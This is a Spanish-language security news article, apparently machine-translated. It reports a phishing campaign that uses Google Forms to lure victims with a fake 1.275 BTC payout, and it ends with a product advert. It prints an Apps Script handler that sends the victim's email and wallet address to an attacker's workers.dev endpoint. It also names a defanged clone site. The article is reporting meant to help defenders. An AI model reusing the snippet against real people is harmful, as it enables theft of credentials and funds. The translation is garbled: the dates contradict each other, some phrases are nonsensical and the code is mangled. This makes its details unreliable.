Google Forms, elogiado por la recopilación de datos sin fricción, se ha convertido en el terreno de puesta en escena poco probable para difundir rápidamente la campaña criptofishing.
Primero detectado a fines de 2014 pero en el segundo trimestre de 2025, la estratagema comienza con un correo electrónico no solicitado que contiene un enlace de forma legítima.
Una vez abierto, el formulario se hace pasar por un intercambio bien conocido y felicita al destinatario por un “pago pendiente de 1.275 BTC”.
Un solo clic de Haga- se dirige hacia un portal de retiro falsificado, donde se les pide que “verifiquen” una dirección de billetera y paguen una “tarifa de red” nominal.
En cuestión de segundos, las credenciales suministradas se desvían a un servidor de comando y control (C2) oculto detrás de los trabajadores de Cloudflare, y cualquier pago se viva a las billeteras de mezcladores, borrando el sendero de dinero.
Lo que hace que la operación sea excepcional es su uso inteligente del motor de notificación de Google Forms.
Debido a que cada señuelo se origina en la propia infraestructura SMTP de Google, las verificaciones de reputación de dominio casi siempre devuelven resultados limpios, otorgando a los adversarios una colocación de bandeja de entrada casi perfecta.
Analistas de Kaspersky anotado El aumento después de observar un aumento del 63 por ciento en los mensajes de phishing basados en Google Forms durante las revisiones de telemetría de rutina de los puntos finales de los consumidores a principios de julio de 2025, marcando la campaña como uno de los ataques de ingeniería social de baja tecnología más efectiva del año.
Mecanismo de infección: recolección de credenciales a través de webhooks integrados
El formulario malicioso aprovecha un Webhook unido a Script APPS que exfiltra los datos en silencio en el momento en que la víctima hace clic en “enviar”, sin esperar la finalización del formulario.
El script también inyecta una redirección de JavaScript única a hxxps: // reclamo-btc-id (.) En línea, un sitio clon que aloja una parte frontal react pulida y una API de frascos de Python que representa cada solicitud al C2 del atacante.
El siguiente fragmento recortado, recuperado de una plantilla de forma filtrada, resalta la rutina exfil:-
function onformsubmit (e) {const payload = json.stringify ({correo electrónico: e.namedValues (‘correo electrónico’) (0), billetera: e.namedValues (‘billetera dirección’) (0)}); Urlfetchapp.fetch (‘https://worker-cryptodrip.workers.dev/submit’, {método: ‘post’, contentType: ‘Application/json’, Payload: Payload}); } La transacción para la transferencia ha sido verificada (fuente – Kaspersky)
Esto muestra el mensaje de phishing inicial, mientras que el siguiente muestra el “portal de retiro falso” captura la página de pago falso.
Los estafadores cuentan con las víctimas que encuentran una oferta de 1.275 BTC demasiado difícil para resistir (fuente – Kaspersky)
La mitigación depende de las defensas en capas: implementa reglas de des-desanimación de contenido que cualicionan cualquier correo electrónico de Google que no estén explícitamente con la lista blanca e implementan extensiones del navegador capaces de bloquear las solicitudes fuera de los dominios de trabajadores desconocidos.
Finalmente, los programas de conciencia de seguridad deben reiterar el principio atemporal: la criptomoneda libre nunca llega a través de una presentación de formulario.
Experimenta una detección de phishing más rápida y precisa y una protección mejorada para su negocio con análisis de sandbox en tiempo real-> Prueba cualquiera.
